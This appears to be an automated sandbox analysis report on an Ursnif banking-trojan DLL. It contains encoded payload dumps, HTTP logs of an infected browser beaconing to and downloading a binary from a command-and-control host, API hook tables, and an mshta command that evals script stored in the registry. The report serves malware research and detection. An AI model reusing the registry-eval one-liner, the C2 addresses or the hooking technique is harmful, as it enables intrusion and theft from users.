ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49788	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:56.869828939 CET	11791	OUT	GET /api1/xN7Vn1nqjV06/Uoae0bry7tu/s480N1RigmgSZ7/ovhVgxM0v2lRZdUdmRPXr/2olZKjleSHMiCKnU/SGGkght_2BNMI_2/BdeG35GUXiZ0jGf3Nd/3Fyunz8gg/k2AMdUoBFgsyj_2BaOEu/BQnpHAOIwtJKSDTYnrI/w6kmi_2BgGuuwzJuTztW0W/4iuVF4d902ob0/E2PA6GSV/Sg1kbgn1io32otLr0SB6JL_/2BZcLfjHz0/pauFVWToc4OpmehUL/g9hTBcF9_2Fd/_2F0_2F2ETj/RAKC8_2FvCntWY/wuqDvU_2FGOflt850WrDr/FxIoV_2BeSB/Suhx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Jan 26, 2021 19:45:57.552026033 CET	11792	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49789	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:57.941216946 CET	11797	OUT	POST /api1/U2cJFG4d72Sw1/coZoTMXb/lP1gviHXrIHWsvunsGl6cnc/P0V_2BL3fj/46b0n6i8fucqBFlqF/hcagnGa1TbpS/dgul3xzYijV/L8f_2B7T21euzh/9_2ByVhlbD4q5WftmVdrM/zBjLhgYQ1PYM0cHh/x5hh2ZDx_2FdFJL/wYla_2Frk0rvM65swQ/cH6PtCte0/lwimgIOiQ_2Fctv6niAP/fIjCPduuWdUdoTOKkQg/18uc85TvLrI_2BdUpjqsJC/iPMSa8oRiSqUF/LVEeH34R/iuq5fk_2BzVlr4Uczzgpoea/kUr98o_2Bs/jBUez8HK/7Gj8QOr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Jan 26, 2021 19:45:58.532283068 CET	11797	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 30 0d 0a 02 49 d5 c3 cf 4a b6 60 1d 7a 52 f9 f8 87 00 6b 49 45 aa 0c 6a 2d 94 13 51 3e ac ac de 7c 21 8f 21 83 6d 7a e3 df 25 cf cf 9d 9d b3 ed f5 1b 61 b9 e2 a7 dd 4c 42 62 6c 1f 95 95 a2 5d 0c 50 43 24 04 32 7e 49 e4 7c de f1 9f b1 f3 0c 0c 0f b3 28 f9 62 a4 50 bc 21 39 6d 78 16 a0 e5 b0 af f4 55 23 5b 19 31 33 85 b6 21 f7 62 b6 92 56 92 0f 0d 0a 30 0d 0a 0d 0a Data Ascii: 70IJ`zRkIEj-Q>\|!!mz%aLBbl]PC$2~I\|(bP!9mxU#[13!bV0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49790	45.138.24.6	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 19:45:58.647962093 CET	11798	OUT	GET /api1/9Dbk1WvXxj1sVm4yff/nk0pg4b0s/UVCKD_2BMZzstnnqhoFp/Ktn8x0OSRfno2WpW3u_/2FDol0BN3XO12yUJgBMYq6/iZh8WugGdwuvs/RKu1CLXP/1Z9vDFru5BWzbqKhcmT_2BM/Qv0FngLhqs/VDpS5UcoEsg1xls7_/2Bvy4JBL4QLN/K_2FtcmAOUK/sIfXs_2BO6Fp5q/oQH0xXcxqaH_2BOp0CawI/7aZdiKs11SUgIJU0/9Pv802DFLf2Wa7N/6q1aWSf7ymVrIOI4pW/il_2Fb_2F/JAX6Lfr2HK2GkQh4Lani/6J0JJGyWOdnxWHH/ueClpx2 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Jan 26, 2021 19:45:59.274738073 CET	11808	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 18:45:59 GMT Content-Type: application/octet-stream Content-Length: 138816 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="60106367039b0.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 36 08 99 f8 4b b3 bd 5f 03 93 a2 a0 2f c3 4b d0 00 75 08 b5 ad a3 c7 98 73 a0 9c df a3 23 30 54 88 0d 65 49 4a 27 14 6f a2 99 fd ff 75 20 9f c2 08 d0 f2 5e 56 4b 12 00 23 b2 48 ac a1 82 6e b4 1d 29 17 f3 82 3d f8 e5 48 85 46 97 86 c5 9b 17 19 83 98 1d fc ff 66 15 97 52 d1 95 7b 47 94 b5 29 6c d3 87 0a 10 2b da 43 32 51 d6 3e 4c 3b f6 57 16 4c 40 e4 cc 4e 6d 16 73 33 c7 9b cf 19 30 50 12 bd a7 73 c7 1d 99 f2 be 18 b8 e8 d1 5a d7 26 0e 11 e7 11 65 d2 53 e1 86 71 e2 08 70 42 78 87 a6 11 15 e5 18 43 e1 51 5d f4 75 8d d5 12 4b 68 69 91 61 f0 9c 9a b5 e9 42 5f 1a e6 87 35 70 bd e8 12 5e 5a 3b 1e 66 0b 02 e6 df 25 9d 5e 0a ec 39 b2 95 65 d5 b6 99 fa 00 a9 d3 97 12 a4 8f fd e6 4e 5e dc 35 73 f6 b7 c7 6f 76 f6 73 c3 d6 62 33 f7 98 65 7b 14 2d aa b5 6b 33 58 e1 60 f1 9f b4 65 85 7e cf b5 05 43 ea 42 57 66 90 3b ef a5 ca 66 de a4 be 2a 27 8c 5a 7f 7b 0f 88 b9 cd 28 21 79 57 89 e2 b6 4c 03 4f 50 37 0e b5 6f 1e fa d4 c5 2a 81 28 3a b0 2d 95 a1 ea 45 00 81 fd b5 fe 0b aa a9 1c a3 c6 65 5f 2e e3 1b a4 18 eb 37 77 0c c9 79 b6 65 4a 1b 48 07 25 ba 62 74 62 00 2f b2 65 d2 00 bd 49 3e fb 4c 72 06 19 2e aa 9c c7 fa 48 03 81 72 12 4c d2 db d3 4a f6 74 db 01 09 51 62 39 cb d5 9f 49 f7 c2 cf 47 5b 65 06 48 ce 55 33 0c 69 88 4a 43 49 e9 9e 12 90 59 71 8b 4b ca d1 2b 1b dd 83 49 e8 77 4f 5f 1c dc be 77 34 9b 22 65 21 55 d3 4a aa 96 f0 5e 3a 83 43 68 ba a3 1a 07 58 86 13 7d 77 3b fd 34 b4 e7 c0 d8 c3 1b 8c 0a cb f5 c4 2e 21 6a 66 6b 9b 21 fa 39 68 dd 8e bc 2d 47 61 b4 1c 90 18 42 bd be 3a 91 7d 5c 29 af 10 89 e2 88 0c 83 8a d9 54 08 9b fc 06 06 09 d4 9c 2d c4 18 a9 83 5e 8b e1 76 17 03 f4 23 07 1b 67 06 c1 26 72 d3 f5 90 6d c5 65 f4 7a e1 5f 1a 7e 76 c1 b4 49 6c 20 c4 77 9f 53 73 ba 94 f3 5e 87 3e 4f 29 62 08 b1 71 e3 c6 c2 2c f0 0a 98 89 48 72 84 4b 49 d0 40 be 01 63 28 b8 29 8f b5 52 f7 24 72 8f 28 c2 c7 55 b4 9a de 8c 0f f7 19 4a 97 b4 5a 36 95 be 30 6f 84 e4 92 75 b0 5c 8e 3a c9 2a 4a 5a aa 41 6e 1f 33 78 ba 5f 4a 65 d4 45 7f e1 fd 31 ac 87 2d 6b f5 ba 7d 27 d0 2b 94 f6 fe 46 53 be bb f0 4a 62 d0 aa 4a 7f 14 bb 8e 1c d4 ed 39 0c 8a 4d f6 3b 8d fa d9 1d 6f c1 25 d8 17 55 77 d5 1f db bf 18 b7 7c a4 83 77 8f 33 19 d9 b1 55 cc 58 b2 99 39 8c b6 31 9f b4 79 d8 b6 b7 d8 4d cf b6 7c b6 a4 d6 5f 86 dd 16 55 66 0c ae 5d e2 88 98 56 de 11 bc 96 56 51 ab 42 63 e8 a0 bc 76 6f c6 c2 43 2d c7 f6 1d d0 39 02 43 50 61 32 4b 30 08 ce 44 e7 01 20 cc a7 81 99 39 f5 4a 48 74 94 8b 9c cb 5e ac bb 96 13 50 4b ac db 1a f4 7a 7f 2a 72 1a 4d 88 1a 3e b8 5e f5 f1 e2 b8 d4 c5 2b 47 94 33 cf e9 55 ac 64 7a 49 6e 04 3a fb f2 c0 c8 b2 8e 6a bc a1 37 16 44 df 4b c4 64 8c 92 81 20 df 01 ef 51 23 4b 83 bd e0 50 ce 05 f5 02 57 50 54 94 cb a9 1a 81 02 92 ef 5f bd dd 82 a5 5a e3 8e ce 4f 8c 45 86 24 bd c3 bf 44 b3 c1 a2 84 55 6b 59 e9 0b 01 33 cc fa 01 Data Ascii: 6K_/Kus#0TeIJ'ou ^VK#Hn)=HFfR{G)l+C2Q>L;WL@Nms30PsZ&eSqpBxCQ]uKhiaB_5p^Z;f%^9eN^5sovsb3e{-k3X`e~CBWf;f'Z{(!yWLOP7o(:-Ee_.7wyeJH%btb/eI>Lr.HrLJtQb9IG[eHU3iJCIYqK+IwO_w4"e!UJ^:ChX}w;4.!jfk!9h-GaB:}\)T-^v#g&rmez_~vIl wSs^>O)bq,HrKI@c()R$r(UJZ60ou\:JZAn3x_JeE1-k}'+FSJbJ9M;o%Uw\|w3UX91yM\|_Uf]VVQBcvoC-9CPa2K0D 9JHt^PKzrM>^+G3UdzIn:j7DKd Q#KPWPT_ZOE$DUkY3

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 26, 2021 19:44:17.551697969 CET	151.101.1.44	443	192.168.2.7	49738	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.551697969 CET	151.101.1.44	443	192.168.2.7	49738	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.560354948 CET	151.101.1.44	443	192.168.2.7	49739	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.560354948 CET	151.101.1.44	443	192.168.2.7	49739	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.562694073 CET	151.101.1.44	443	192.168.2.7	49743	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.562694073 CET	151.101.1.44	443	192.168.2.7	49743	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563131094 CET	151.101.1.44	443	192.168.2.7	49741	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563131094 CET	151.101.1.44	443	192.168.2.7	49741	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563146114 CET	151.101.1.44	443	192.168.2.7	49742	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.563146114 CET	151.101.1.44	443	192.168.2.7	49742	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.565854073 CET	151.101.1.44	443	192.168.2.7	49740	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020	Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 26, 2021 19:44:17.565854073 CET	151.101.1.44	443	192.168.2.7	49740	CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Sep 24 02:00:00 CEST 2020	Tue Sep 24 01:59:59 CEST 2030		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFFAC2D521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFFAC2D5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFFAC2D520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1892 Parent PID: 5636

General

Start time:	19:44:08
Start date:	26/01/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll'
Imagebase:	0x10000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: regsvr32.exe PID: 4496 Parent PID: 1892

General

Start time:	19:44:08
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll
Imagebase:	0x930000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: cmd.exe PID: 5712 Parent PID: 1892

General

Start time:	19:44:09
Start date:	26/01/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 3104 Parent PID: 5712

General

Start time:	19:44:09
Start date:	26/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff724940000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6160 Parent PID: 3104

General

Start time:	19:44:10
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6504 Parent PID: 3104

General

Start time:	19:44:58
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 6456 Parent PID: 3104

General

Start time:	19:45:06
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: iexplore.exe PID: 5272 Parent PID: 3104

General

Start time:	19:45:16
Start date:	26/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2
Imagebase:	0x160000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: mshta.exe PID: 4220 Parent PID: 3292

General

Start time:	19:45:25
Start date:	26/01/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
